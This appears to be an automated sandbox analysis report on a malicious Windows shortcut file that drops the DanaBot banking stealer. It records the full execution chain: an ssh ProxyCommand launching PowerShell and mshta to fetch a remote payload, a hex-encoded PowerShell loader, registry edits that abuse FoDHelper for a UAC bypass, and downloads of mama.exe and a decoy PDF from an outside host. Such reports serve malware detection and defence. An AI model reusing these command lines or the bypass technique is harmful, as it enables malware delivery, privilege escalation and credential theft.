          Source: mshta.exe, 00000009.00000002.1695254221.000001FC4D706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4g
          Source: mshta.exe, 00000009.00000003.1683955749.0000020454955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4https://150.241.97.10/aaa.mp4
          Source: mshta.exe, 00000009.00000003.1670028016.000001FC4D729000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695409994.000001FC4D72A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4l
          Source: powershell.exe, 00000008.00000002.1301938072.0000026DD4568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4lePa
          Source: powershell.exe, 00000008.00000002.1303247475.0000026DD47D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4m32;C:
          Source: mshta.exe, 00000009.00000002.1696165749.000001FC4D970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4ndow
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD62C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4p
          Source: mshta.exe, 00000009.00000002.1695362199.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1682520730.000001FC4D71D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671976829.000001FC4D71C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://150.241.97.10/aaa.mp4zL
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD6766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://150.241.X
          Source: powershell.exe, 00000008.00000002.1303793808.0000026DD6320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1303793808.0000026DD630D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1589229169.000001A5A43C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
          Source: svchost.exe, 0000000E.00000003.1310921737.000001FA6F670000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.14.dr, edb.log.14.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A5433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: mshta.exe, 00000009.00000003.1687406678.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1670028016.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1671405780.000001FC4D792000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1695579292.000001FC4D792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comnM
          Source: powershell.exe, 00000010.00000002.1627341711.000001A5B4432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: qmgr.db.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A6159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A45EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/ggg.pdf
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A6159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/ggg.pdfp
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A48B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/mama.exe
          Source: powershell.exe, 00000010.00000002.1589229169.000001A5A48B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pravo-bashkortostan.ru/mama.exeu
          Source: ReaderMessages.33.drString found in binary or memory: https://www.adobe.co
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49699 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.241.97.10:443 -> 192.168.2.7:49719 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected DanaBot stealer dll
          Source: Yara matchFile source: 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: mama.exe PID: 1532, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Powershell drops PE file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mama.exeJump to dropped file
          Windows shortcut file (LNK) contains suspicious command line arguments
          Source: A4FY1OA97K.lnkLNK file: -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_03525340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,46_2_03525340
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAACA227858_2_00007FFAACA22785
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAB3F0E4516_2_00007FFAAB3F0E45
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAB4C0FB616_2_00007FFAAB4C0FB6
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\mama.exe 8E6AE3B356D2205296FEC0761DAA461A311190E50E0E611699EBB4AAD6E6CD77
          Source: mama.exe.16.drStatic PE information: Number of sections : 11 > 10
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 4181
          Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 4181Jump to behavior
          Source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.evad.winLNK@79/70@3/5
          Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-508009730
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj12fnnf.lxl.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\AppData\Roaming\mama.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: mama.exe, 0000002E.00000003.1676967507.000000007E960000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: A4FY1OA97K.lnkVirustotal: Detection: 41%
          Source: A4FY1OA97K.lnkReversingLabs: Detection: 34%
          Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w 1 -ep Unrestricted -nop
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ggg.pdf"
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
          Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1640,i,18218259324661631593,8502747299906731977,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe FoDHelper.exe
          Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\r.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user~1\AppData\Local\Temp\r.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\mama.exe C:\Users\user\AppData\Roaming\mama.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F && REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\MS-Settings /F
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Users\user\AppData\Roaming\mama.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4Jump to behavior
